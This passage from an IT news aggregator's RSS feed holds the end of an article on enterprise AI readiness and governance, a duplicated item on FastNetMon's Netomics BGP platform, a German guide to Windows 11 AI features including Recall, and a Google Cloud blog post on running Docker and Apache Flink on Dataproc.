<p>Different types of AI require different skills and governance, Talasaz says. “General use focuses on productivity on the desktop,” he says. “Integrated AI — industrial-capable AI embedded within core business processes — requires different skills, capabilities, and governance.”</p>



<p>For desktop AI, training and guardrails help employees be successful — what Talasaz calls “bumpers,” like in bowling. Organizations need to <a href="https://www.cio.com/article/4117091/how-ai-upskilling-fails-and-what-it-leaders-are-doing-to-get-it-right.html">help employees through reskilling and guidance</a>. “You have tools in a toolbox,” he says. “It’s important to know when to use a power tool versus when you need a screwdriver.”</p>



<p>But for integrated AI embedded in core processes, the stakes are higher. “Business leaders responsible for business outcomes based on AI-driven processes need to be fully aware of both the benefits and risks that come along with using these tools,” Talasaz says.</p>



<p>That distinction matters for governance, too. Lower-, medium-, and high-risk AI use cases may require <a href="https://www.csoonline.com/article/4188573/rethinking-the-balance-between-ai-oversight-and-innovation.html">different ways of working and different risk management approaches</a>. “Deploying AI in potentially high-risk or high-cost areas of the business requires a higher level of rigor,” Talasaz says. “That’s different than building something that helps write my emails.”</p>



<h2 class="wp-block-heading">From POC to production</h2>



<p>Perhaps the biggest readiness gap is the transition <a href="https://www.cio.com/article/3850763/88-of-ai-pilots-fail-to-reach-production-but-thats-not-all-on-it.html">from proof of concept to production</a>. “It requires such a different approach,” Talasaz says. “A successful proof of concept can create a lot of excitement, but when teams are unprepared to build and scale, it can create the potential to over-promise and under-deliver.”</p>



<p>The operating model that works for experimentation doesn’t work for production at scale. Proofs of concept are designed to demonstrate the efficacy of ideas and the underlying technology. But building, scaling, and sustaining technology in the business requires operating models, standards, roles, and skills that many organizations haven’t developed. Intentionally designed operating models reduce the cost of learning, improve execution, and increase delivery velocity, says Talasaz.</p>



<p>But there’s no one-size-fits-all answer. “A business that needs to build capabilities in a marketplace moving very fast requires one kind of operating model,” Talasaz says. “A business that can take longer to develop business capabilities and adapt to market changes can choose a different operating model. It’s important to design ways of working tailored to what the business needs and the speed at which the business needs to leverage technology to be successful.”</p>



<p>Jabil is navigating this journey as part of its move to SAP’s cloud ERP through RISE, scaling from $29 billion to $34 billion in revenue while keeping selling, general, and administrative (SG&amp;A) expenses relatively flat — in part by layering generative AI onto predictive analytics capabilities built over years.</p>



<p>“We started years ago with computer vision to drive product quality,” Christensen says. “As gen AI blew up, we took the predictive analytics we had <a href="https://www.cio.com/article/193580/upskilling-transforms-jabil-employees-into-data-scientists.html">built over the years</a> and imbued them with gen AI. We’ve implemented the basics, and now we’re looking for complex scenarios.”</p>



<h2 class="wp-block-heading">Governance built in, not bolted on</h2>



<p>Governance is often treated as a policy document or committee. It should be embedded in the operating model itself, Talasaz argues.</p>



<p>“The operating model doesn’t always get the attention it needs,” he says. “Policies and committees are useful, but they should handle larger enterprise risks. Most of the governance should be embedded in the operating model to ensure you’re getting outcomes you want.”</p>



<p>That might mean peer review built into the development process, bias checks before deployment, or clear escalation paths for high-risk use cases. When governance is separate from the operating model, it tends to slow things down. When it’s integrated, it becomes how work naturally gets done, says Talasaz.</p>



<p>Governance at the agent level matters, too, Levi’s Gowans says. “Know what agents have been deployed, who authored them, and who’s responsible,” he says, noting that the company has established a registry to understand what agents it has operating within its networks.</p>



<p>The challenges of AI governance are unique, Lopez of Lopez Research says. “Very few people have the governance stack required to say they did the right things with AI,” she says. “<a href="https://www.csoonline.com/article/2132294/what-are-non-human-identities-and-why-do-they-matter.html">Non-human identity</a> and access control is totally different and, frankly, evolving so quickly that no one knows what to do.”</p>



<p>The challenge is ultimately a trade-off, Forrester’s Evelson says. “Push agentic AI capabilities too far, and you risk creating a governance and compliance nightmare,” he says. “Tighten controls too aggressively, and you stifle innovation. Best practices for <a href="https://www.cio.com/article/4188566/cios-rethink-the-balance-between-ai-oversight-and-innovation.html">striking the right balance</a> are still being discovered.”</p>



<h2 class="wp-block-heading">It takes a team</h2>



<p>The AI readiness gap isn’t about technology — it’s about the work organizations have been deferring for years. Data quality. Operating models. Executive sponsorship. Skills and culture. Governance embedded in process.</p>



<p>“Once you progress from everyone using Copilot to putting agents in production, then you realize the need for business context,” Gowans of Levi Strauss says.</p>



<p>It’s a shared journey requiring all teams to understand what’s required, Talasaz says. “It involves helping people understand what it takes from all sides — the technology itself, the operating model, the skills and talents needed — but also working with business leaders on the art of the possible,” he says. “Helping them understand both the benefits and the responsibility of deploying this tech.”</p>



<p>A colleague of his calls AI “the ultimate executive team sport.”</p>



<p>“It requires people to do it well and manage it,” Talasaz says.</p>



<p></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[FastNetMon eliminates third-party bgp lookups with Netomics]]></title>
<description><![CDATA[FastNetMon is introducing Netomics, a self-hosted BGP routing intelligence platform that combines live routing data, registry information, RPKI validation, routing history and AI-assisted querying into a single application. Built for internet service providers (ISPs), cloud providers, Internet Ex...]]></description>
<link>https://tsecurity.de/de/3664869/it-security-nachrichten/fastnetmon-eliminates-third-party-bgp-lookups-with-netomics/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3664869/it-security-nachrichten/fastnetmon-eliminates-third-party-bgp-lookups-with-netomics/</guid>
<pubDate>Mon, 13 Jul 2026 12:08:31 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>FastNetMon is introducing Netomics, a self-hosted BGP routing intelligence platform that combines live routing data, registry information, RPKI validation, routing history and AI-assisted querying into a single application. Built for internet service providers (ISPs), cloud providers, Internet Exchange Points (IXPs)…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/fastnetmon-eliminates-third-party-bgp-lookups-with-netomics/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/fastnetmon-eliminates-third-party-bgp-lookups-with-netomics/">FastNetMon eliminates third-party bgp lookups with Netomics</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[FastNetMon eliminates third-party bgp lookups with Netomics]]></title>
<description><![CDATA[FastNetMon is introducing Netomics, a self-hosted BGP routing intelligence platform that combines live routing data, registry information, RPKI validation, routing history and AI-assisted querying into a single application. Built for internet service providers (ISPs), cloud providers, Internet Ex...]]></description>
<link>https://tsecurity.de/de/3664791/it-security-nachrichten/fastnetmon-eliminates-third-party-bgp-lookups-with-netomics/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3664791/it-security-nachrichten/fastnetmon-eliminates-third-party-bgp-lookups-with-netomics/</guid>
<pubDate>Mon, 13 Jul 2026 11:38:09 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>FastNetMon is introducing Netomics, a self-hosted BGP routing intelligence platform that combines live routing data, registry information, RPKI validation, routing history and AI-assisted querying into a single application. Built for internet service providers (ISPs), cloud providers, Internet Exchange Points (IXPs) and enterprises operating large IP networks, Netomics provides complete visibility into global internet routing without relying on third-party lookup services. Network engineers often need to consult multiple public tools to investigate routing incidents, validate prefix … <a href="https://www.helpnetsecurity.com/2026/07/13/fastnetmon-netomics/" rel="nofollow">More <span class="meta-nav">→</span></a></p>
<p>The post <a href="https://www.helpnetsecurity.com/2026/07/13/fastnetmon-netomics/">FastNetMon eliminates third-party bgp lookups with Netomics</a> appeared first on <a href="https://www.helpnetsecurity.com/">Help Net Security</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Diese Windows-11-KI-Funktionen brauchen Sie wirklich]]></title>
<description><![CDATA[Windows 11 bringt mehrere KI-Funktionen mit, die sofort weiterhelfen. Live-Untertitel zeigen jeden Ton als Text, eine Echtzeit-Übersetzung läuft auf passender Hardware, und Recall durchsucht zurückliegende Bildschirminhalte. Manches steht jedem offen, anderes hängt am Gerät.



Microsoft verteilt...]]></description>
<link>https://tsecurity.de/de/3662871/it-nachrichten/diese-windows-11-ki-funktionen-brauchen-sie-wirklich/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3662871/it-nachrichten/diese-windows-11-ki-funktionen-brauchen-sie-wirklich/</guid>
<pubDate>Sun, 12 Jul 2026 08:32:34 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Windows 11 bringt mehrere KI-Funktionen mit, die sofort weiterhelfen. Live-Untertitel zeigen jeden Ton als Text, eine Echtzeit-Übersetzung <a href="https://www.pcwelt.de/article/3141725/snapdragon-x2-elite-ki-notebook-rechenleistung.html" target="_blank" rel="noreferrer noopener">läuft auf passender Hardware</a>, und <a href="https://www.pcwelt.de/article/3141121/windows-recall-deaktivieren-screenshots-loeschen-datenschutz.html" target="_blank" rel="noreferrer noopener">Recall</a> durchsucht zurückliegende Bildschirminhalte. Manches steht jedem offen, anderes hängt am Gerät.</p>



<p>Microsoft verteilt die KI-Funktionen schrittweise und nach Hardware gestaffelt. Ältere Rechner erhalten die Grundfunktionen, neuere Geräte mit eigener KI-Einheit bekommen mehr. Nicht jedes System zeigt sofort alle Optionen, und mit jedem größeren Update kommt Weiteres hinzu. Mehrere Funktionen helfen schon heute im täglichen Einsatz, ohne dass Sie Zusatzsoftware installieren müssen. Die <a href="https://support.microsoft.com/de-de/accessibility/windows/use-live-captions-to-better-understand-audio">offizielle Anleitung zu den Live-Untertiteln stellt Microsoft auf seinen Support-Seiten bereit</a>.</p>



<h2 class="wp-block-heading toc">Live-Untertitel verwandeln jeden Ton in Text</h2>



<p>Die Funktion fängt das Audiosignal Ihres Rechners ab, erkennt gesprochene Sprache und blendet sie als Text ein. Das funktioniert unabhängig von der App. Ob YouTube im Browser, eine Mediathek, ein Podcast, ein Hörbuch oder die Stimme des Gegenübers in einer Videokonferenz – der Text läuft mit. Der Rechner verarbeitet alles vor Ort. Nach dem einmaligen Download der Sprachdateien benötigen Sie keine Internetverbindung mehr, und nichts davon wandert in die Cloud.</p>



<p>Zum Einschalten genügt die Tastenkombination <em>Windows + Strg + L</em>. Alternativ klicken Sie sich über “<em>Einstellungen” -&gt; “Barrierefreiheit” -&gt; “Untertitel</em>” durch und stellen die Live-Untertitel auf Ein. Beim ersten Start lädt Windows die passenden Sprachpakete herunter, ein Vorgang von wenigen Sekunden. Deutsch steht für die reinen Untertitel zur Verfügung.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a5334c69adf3"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/06/ki-funktionen-01.png?w=1200" alt="Live-Untertitel in Windows 11" class="wp-image-3178657" width="1200" height="863" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Thomas Joos</p></div>



<p>Über das Zahnrad im Untertitelfenster passen Sie Position, Schriftgröße und Farbe an. Sie verschieben den Textbereich an den oberen oder unteren Rand oder lassen ihn frei schweben. Auf Wunsch bezieht die Funktion auch das Mikrofon ein und verschriftlicht Ihre eigene Stimme, praktisch bei Diktaten oder Gesprächen vor Ort.</p>



<p>Ein Filter blendet Schimpfwörter aus. Mehrere Grenzen sollten Sie kennen. Das System erkennt nur menschliche Sprache, Liedtexte und Geräusche bleiben außen vor. Treffen Mikrofon- und Computerton zusammen, hat die Tonausgabe des Rechners Vorrang.</p>



<p><em>Übrigens: Sollten Sie Windows 11 Home im Einsatz haben, dann entgehen Ihnen die vielen Vorteile der Pro-Version, die wir Ihnen <a href="https://www.pcwelt.de/article/1203134/windows-11-unterschiede-zwischen-home-und-pro-version.html" target="_blank" rel="noreferrer noopener">hier vorstellen.</a> Im PC-WELT Software-Shop ist das Windows-11-Upgrade <a href="https://software.pcwelt.de/offer/windows_11_professional_upgrade/44487?x-source=rss" target="_blank" rel="noreferrer noopener">für günstige 59,99 Euro statt 145 Euro</a> erhältlich.</em></p>



<h2 class="wp-block-heading toc">Die Übersetzung hängt an der Hardware</h2>



<p>Die Untertitel kann Windows auch übersetzen, doch dafür gelten engere Voraussetzungen. Nötig ist ein Copilot+ PC mit eigener KI-Einheit und mindestens Windows 11 in der Version 24H2. Auf solchen Geräten überträgt das System gesprochene Inhalte aus über 40 Sprachen ins Englische und aus 27 Sprachen ins vereinfachte Chinesisch, in Echtzeit und ohne Cloud.</p>



<p>Der praktische Nutzen hat enge Grenzen. Die Zielsprache lautet Englisch oder vereinfachtes Chinesisch. Ein fremdsprachiges Video holt das System ins Englische. Für eine deutsche Ausgabe greifen Sie zu anderen Mitteln, darunter die eigenen Untertitelfunktionen von YouTube oder Netflix oder eine Übersetzung im Browser. Auf Rechnern ohne Copilot+ Technik bleiben die Standarduntertitel verfügbar, die Übersetzung erfordert die neuere Hardware.</p>



<p>Microsoft hat auf der Entwicklerkonferenz Build 2026 angekündigt, die lokale Spracherkennung und Funktionen wie die Live-Untertitel künftig auch auf normalen Prozessoren und Grafikkarten laufen zu lassen. Die Bindung an spezielle KI-Chips lockert sich damit, Microsoft verteilt die Neuerungen schrittweise über kommende Updates. Wann genau welche Sprache und welches Gerät an der Reihe ist, hat Microsoft offengelassen.</p>



<h2 class="wp-block-heading toc">Recall durchsucht alte Bildschirminhalte</h2>



<p>Recall fertigt im Abstand weniger Sekunden Momentaufnahmen Ihres Bildschirms an, speichert sie verschlüsselt auf der Festplatte und macht sie durchsuchbar. Sie beschreiben mit eigenen Worten, was Sie gesehen haben, und das System liefert die passende Stelle zurück. Eine Webseite, ein Dokument oder eine App-Ansicht von gestern findet sich so wieder, auch ohne Dateinamen oder Verlauf.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a5334c69bc22"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2025/11/windows_recall_6.jpg?quality=50&amp;strip=all" alt="Die neue semantische Suche von Microsoft soll das Auffinden von Bildern vereinfachen, noch aber ist die Funktion nur in den Insider Builds von Windows 11 verfügbar." class="wp-image-2976485" width="934" height="582" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button><figcaption class="wp-element-caption"><p>Die neue semantische Suche von Microsoft soll das Auffinden von Bildern vereinfachen, noch aber ist die Funktion nur in den Insider Builds von Windows 11 verfügbar.</p>
</figcaption></figure><p class="imageCredit">Foundry</p></div>



<p>Der Vorteil zeigt sich bei häufiger Rücksuche. Suchen Sie oft nach früher gesehenen Inhalten, sparen Sie sich das mühsame Durchklicken von Ordnern und Browserverlauf. Bei seltener Nutzung bleibt der Gewinn gering, die offenen Datenschutzfragen bestehen weiter. Recall hält fest, was auf dem Schirm erscheint, darunter private Nachrichten, Bankdaten oder Gesundheitsinformationen. Ein Filter für sensible Inhalte greift, arbeitet aber nicht lückenlos. Deshalb sperren einzelne Programme, darunter Signal und der Brave-Browser, ihre Inhalte gegen die Aufnahme.</p>



<p>Mehrere Hürden schützen Sie vorab. Recall läuft nur auf Copilot+ PCs, setzt die Anmeldung über Windows Hello voraus und bleibt nach der Einrichtung ausgeschaltet. Erst Ihre bewusste Zustimmung startet die Aufnahmen. Pro Quartal beanspruchen die Momentaufnahmen bis zu 25 Gigabyte Speicher. Einzelne Apps und Webseiten können ausgeschlossen werden, Aufnahmen pausieren oder löschen.</p>



<p>Zum Abschalten öffnen Sie “Einstellungen” -&gt; “Datenschutz und Sicherheit” -&gt; “Recall und Snapshots” und stellen die Option zum Speichern der Aufnahmen auf Aus. Vorhandene Aufnahmen entfernen Sie an gleicher Stelle. <a href="https://www.pcwelt.de/article/3141121/windows-recall-deaktivieren-screenshots-loeschen-datenschutz.html" target="_blank" rel="noreferrer noopener">Eine ausführliche Schritt-für-Schritt-Anleitung zum Deaktivieren und zum Löschen der Screenshots steht bereit</a>. </p>



<p>Zur Prüfung per Programm steht das kostenlose <a href="https://www.dpbolvw.net/click-3275038-13645854?sid=rss&amp;url=https://www.ashampoo.com/de-de/stop-recall" target="_blank" rel="noreferrer noopener">Stop Recall von Ashampoo</a> bereit. Das Tool kontrolliert den zuständigen Registry-Wert und schaltet die Funktion per Klick ab. Hilfreich ist das auch nach Updates, denn ein Update kann die Einstellung zurücksetzen. <a href="https://support.microsoft.com/de-DE/Windows/Ai/Ai-Features/retrace-your-steps-with-recall" target="_blank" rel="noreferrer noopener">Microsoft beschreibt die Funktion</a> und ihre Kontrollmöglichkeiten ebenfalls im eigenen Support.</p>



<h2 class="wp-block-heading toc">Editor und Copilot erledigen kleine Aufgaben</h2>



<p>Auch der schlichte Editor von Windows kann inzwischen KI-Funktionen nutzen. Die Schreibtools aktivieren Sie über das Zahnrad oben rechts, indem Sie in den Einstellungen ganz nach unten scrollen und die entsprechende Option einschalten. Anschließend markieren Sie einen Text, klicken mit der rechten Maustaste und lassen ihn zusammenfassen oder mithilfe vorgegebener Optionen umformulieren. Wenn Ihnen die Funktion nicht gefällt, können Sie sie an gleicher Stelle jederzeit wieder deaktivieren.</p>



<p>Der Copilot-Assistent beantwortet Fragen, formuliert Texte um und steuert auf Zuruf sogar Systemeinstellungen wie Bluetooth, die Bildschirmhelligkeit oder den Dunkelmodus. Starten lässt er sich über die Copilot-Taste auf neueren Tastaturen oder per Tastenkombination <strong>Windows + C</strong>. Viele Funktionen laufen dabei über die Cloud und erfordern ein Microsoft-Konto. Eine neue Suchfunktion namens „Ask Copilot“ soll mittelfristig die klassische Windows-Suche in der Taskleiste ersetzen, bleibt jedoch optional und wird nicht automatisch aktiviert.</p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[New Dataproc optional components support Apache Flink and Docker]]></title>
<description><![CDATA[Google Cloud’s Dataproc lets you run native Apache Spark and Hadoop clusters on Google Cloud in a simpler, more cost-effective way. In this blog, we will talk about our newest optional components available in Dataproc’s Component Exchange: Docker and Apache Flink.Docker container on DataprocDocke...]]></description>
<link>https://tsecurity.de/de/3662840/it-security-nachrichten/new-dataproc-optional-components-support-apache-flink-and-docker/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3662840/it-security-nachrichten/new-dataproc-optional-components-support-apache-flink-and-docker/</guid>
<pubDate>Sun, 12 Jul 2026 08:07:02 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div class="block-paragraph"><p>Google Cloud’s Dataproc lets you run native Apache Spark and Hadoop clusters on Google Cloud in a simpler, more cost-effective way. In this blog, we will talk about our newest optional components available in Dataproc’s Component Exchange: Docker and Apache Flink.</p><h3>Docker container on Dataproc</h3><p>Docker is a widely used container technology. Since it’s now a Dataproc optional component, Docker daemons can now be installed on every node of the Dataproc cluster. This will give you the ability to install containerized applications and interact with Hadoop clusters easily on the cluster. </p><p>In addition, Docker is also critical to supporting these features:</p><ol><li><p>Running containers with YARN</p></li><li><p>Portable Apache Beam job</p></li></ol><p>Running containers on YARN allows you to manage dependencies of your YARN application separately, and also allows you to create containerized services on YARN. <a href="https://hadoop.apache.org/docs/current/hadoop-yarn/hadoop-yarn-site/DockerContainers.html" target="_blank">Get more details here.</a> Portable Apache Beam packages jobs into Docker containers and submits them the Flink cluster. Find <a href="https://beam.apache.org/roadmap/portability/" target="_blank">more detail about Beam portability</a>. </p><p>Docker optional component is also configured to use <a href="https://cloud.google.com/container-registry">Google Container Registry</a>, in addition to the default Docker registry. This lets you use container images managed by your organization.</p><p>Here is how to create a Dataproc cluster with the Docker optional component:</p><p><code>gcloud beta dataproc clusters create &lt;cluster-name&gt; \</code><br><code>  --optional-components=DOCKER \</code><br><code>  --image-version=1.5</code></p><p>When you run the Docker application, the log will be streamed to Cloud Logging, using gcplogs driver.</p><p>If your application does not depend on any Hadoop services, check out <a href="https://kubernetes.io/" target="_blank">Kubernetes</a> and <a href="https://cloud.google.com/kubernetes-engine/docs/quickstart">Google Kubernetes Engine</a> to run containers natively. For more on using Dataproc, <a href="https://cloud.google.com/dataproc/docs">check out our documentation</a>.</p><h3>Apache Flink on Dataproc</h3><p>Among streaming analytics technologies, Apache Beam and Apache Flink stand out. Apache Flink is a distributed processing engine using stateful computation. <a href="https://beam.apache.org/get-started/beam-overview/" target="_blank">Apache Beam</a> is a unified model for defining batch and steaming processing pipelines. Using <a href="https://beam.apache.org/documentation/runners/flink/" target="_blank">Apache Flink as an execution engine</a>, you can also run Apache Beam jobs on Dataproc, in addition to Google’s Cloud Dataflow service.</p><p>Flink and running Beam on Flink are suitable for large-scale, continuous jobs, and provide:</p><ul><li><p>A streaming-first runtime that supports both batch processing and data streaming programs</p></li><li><p>A runtime that supports very high throughput and low event latency at the same time</p></li><li><p>Fault-tolerance with exactly-once processing guarantees</p></li><li><p>Natural back-pressure in streaming programs</p></li><li><p>Custom memory management for efficient and robust switching between in-memory and out-of-core data processing algorithms</p></li><li><p>Integration with YARN and other components of the Apache Hadoop ecosystem</p></li></ul><p>Our Dataproc team here at Google Cloud recently announced that <a href="https://cloud.google.com/blog/products/data-analytics/open-source-processing-engines-for-kubernetes">Flink Operator on Kubernetes</a> is now available. It allows you to run Apache Flink jobs in Kubernetes, bringing the benefits of reducing platform dependency and producing better hardware efficiency. </p><p><b>Basic Flink Concepts</b></p><p>A Flink cluster consists of a Flink JobManager and a set of Flink TaskManagers. Like similar roles in other distributed systems such as YARN, JobManager has responsibilities such as accepting jobs, managing resources and supervising jobs. TaskManagers are responsible for running the actual tasks. </p><p>When running Flink on Dataproc, we use YARN as resource manager for Flink. You can run Flink jobs in 2 ways: job cluster and session cluster. For the job cluster, YARN will create JobManager and TaskManagers for the job and will destroy the cluster once the job is finished. For session clusters, YARN will create JobManager and a few TaskManagers.The cluster can serve multiple jobs until being shut down by the user.</p><p><b>How to create a cluster with Flink</b></p><p>Use this command to get started:</p><p><code>gcloud beta dataproc clusters create &lt;cluster-name&gt; \</code><br><code>  --optional-components=FLINK \</code><br><code>  --image-version=1.5</code></p><p><b>How to run a Flink job</b></p><p>After a Dataproc cluster with Flink starts, you can submit your Flink jobs to YARN directly using the Flink job cluster. After accepting the job, Flink will start a JobManager and slots for this job in YARN. The Flink job will be run in the YARN cluster until finished. The JobManager created will then be shut down. Job logs will be available in regular YARN logs. Try this command to run a word-counting example:</p></div>
<div class="block-code"><dl>
    <dt>code_block</dt>
    <dd>&lt;ListValue: [StructValue([('code', 'HADOOP_CLASSPATH=`hadoop classpath` flink run -m yarn-cluster /usr/lib/flink/examples/batch/WordCount.jar'), ('language', ''), ('caption', &lt;wagtail.rich_text.RichText object at 0x7f58aa8374c0&gt;)])]&gt;</dd>
</dl></div>
<div class="block-paragraph"><p>The Dataproc cluster will not start a <a href="https://ci.apache.org/projects/flink/flink-docs-release-1.10/ops/deployment/yarn_setup.html#flink-yarn-session" target="_blank">Flink Session</a> cluster by default. Instead, Dataproc will create the script “/usr/bin/flink-yarn-daemon,” which will start a Flink session. </p><p>If you want to start a Flink session when Dataproc is created, use the metadata key to allow it:</p></div>
<div class="block-code"><dl>
    <dt>code_block</dt>
    <dd>&lt;ListValue: [StructValue([('code', 'gcloud dataproc clusters create &lt;cluster-name&gt; \\\r\n    --optional-components=FLINK \\ \r\n    --image-version=1.5 \\\r\n    --metadata flink-start-yarn-session=true'), ('language', ''), ('caption', &lt;wagtail.rich_text.RichText object at 0x7f58aa837580&gt;)])]&gt;</dd>
</dl></div>
<div class="block-paragraph"><p>If you want to start the Flink session after Dataproc is created, you can run the following command on master node:</p></div>
<div class="block-code"><dl>
    <dt>code_block</dt>
    <dd>&lt;ListValue: [StructValue([('code', '$ . /usr/bin/flink-yarn-daemon'), ('language', ''), ('caption', &lt;wagtail.rich_text.RichText object at 0x7f58aa8375e0&gt;)])]&gt;</dd>
</dl></div>
<div class="block-paragraph"><p>Submit jobs to that session cluster. You’ll need to get the Flink JobManager URL:</p></div>
<div class="block-code"><dl>
    <dt>code_block</dt>
    <dd>&lt;ListValue: [StructValue([('code', 'HADOOP_CLASSPATH=`hadoop classpath` flink run -m &lt;JOB_MANAGER_HOSTNAME&gt;:&lt;REST_API_PORT&gt; /usr/lib/flink/examples/batch/WordCount.jar'), ('language', ''), ('caption', &lt;wagtail.rich_text.RichText object at 0x7f58aa837640&gt;)])]&gt;</dd>
</dl></div>
<div class="block-paragraph"><p><b>How to run a Java Beam job</b></p><p>It is very easy to run an Apache Beam job written in Java. There is no extra configuration needed. As long as you package your Beam jobs into a JAR file, you do not need to configure anything to run Beam on Flink. This is the command you can use:</p></div>
<div class="block-code"><dl>
    <dt>code_block</dt>
    <dd>&lt;ListValue: [StructValue([('code', '$ mvn package -Pflink-runner\r\n$ bin/flink run -c org.apache.beam.examples.WordCount /path/to/your.jar\r\n--runner=FlinkRunner --other-parameters'), ('language', ''), ('caption', &lt;wagtail.rich_text.RichText object at 0x7f58aa8376a0&gt;)])]&gt;</dd>
</dl></div>
<div class="block-paragraph"><p><b>How to run a Python Beam job written in Python</b></p><p>Beam jobs written in Python use a different execution model. To run them in Flink on Dataproc, you will also need to enable the Docker optional component. Here’s how to create a cluster:</p></div>
<div class="block-code"><dl>
    <dt>code_block</dt>
    <dd>&lt;ListValue: [StructValue([('code', 'gcloud dataproc clusters create &lt;cluster-name&gt; \\\r\n    --optional-components=FLINK,DOCKER'), ('language', ''), ('caption', &lt;wagtail.rich_text.RichText object at 0x7f58aa837700&gt;)])]&gt;</dd>
</dl></div>
<div class="block-paragraph"><p>You will also need to install necessary Python libraries needed by Beam, such as apache_beam and apache_beam[gcp]. You can pass in a Flink master URL to let it run in a session cluster. If you leave the URL out, you need to use the job cluster mode to run this job:</p></div>
<div class="block-code"><dl>
    <dt>code_block</dt>
    <dd>&lt;ListValue: [StructValue([('code', 'import apache_beam as beam\r\nfrom apache_beam.options.pipeline_options import PipelineOptions\r\n\r\noptions = PipelineOptions([\r\n    "--runner=FlinkRunner",\r\n    "--flink_version=1.9",\r\n    "--flink_master=localhost:8081",\r\n    "--environment_type=DOCKER"\r\n])\r\nwith beam.Pipeline(options=options) as p:\r\n    ...'), ('language', ''), ('caption', &lt;wagtail.rich_text.RichText object at 0x7f58aa837760&gt;)])]&gt;</dd>
</dl></div>
<div class="block-paragraph"><p>After you’ve written your Python job, simply run it to submit:</p></div>
<div class="block-code"><dl>
    <dt>code_block</dt>
    <dd>&lt;ListValue: [StructValue([('code', '$ python wordcount.py'), ('language', ''), ('caption', &lt;wagtail.rich_text.RichText object at 0x7f58aa8377c0&gt;)])]&gt;</dd>
</dl></div>
<div class="block-paragraph"><p><a href="https://cloud.google.com/dataproc">Learn more about Dataproc.</a></p></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Buildpacks vs Jib vs Dockerfile: Comparing containerization methods]]></title>
<description><![CDATA[As developers we work on source code, but production systems don't run source, they need a runnable thing. Starting many years ago, most enterprises were using Java EE (aka J2EE) and the runnable "thing" we would deploy to production was a ".jar", ".war", or ".ear" file. Those files consisted of ...]]></description>
<link>https://tsecurity.de/de/3662836/it-security-nachrichten/buildpacks-vs-jib-vs-dockerfile-comparing-containerization-methods/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3662836/it-security-nachrichten/buildpacks-vs-jib-vs-dockerfile-comparing-containerization-methods/</guid>
<pubDate>Sun, 12 Jul 2026 08:06:57 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
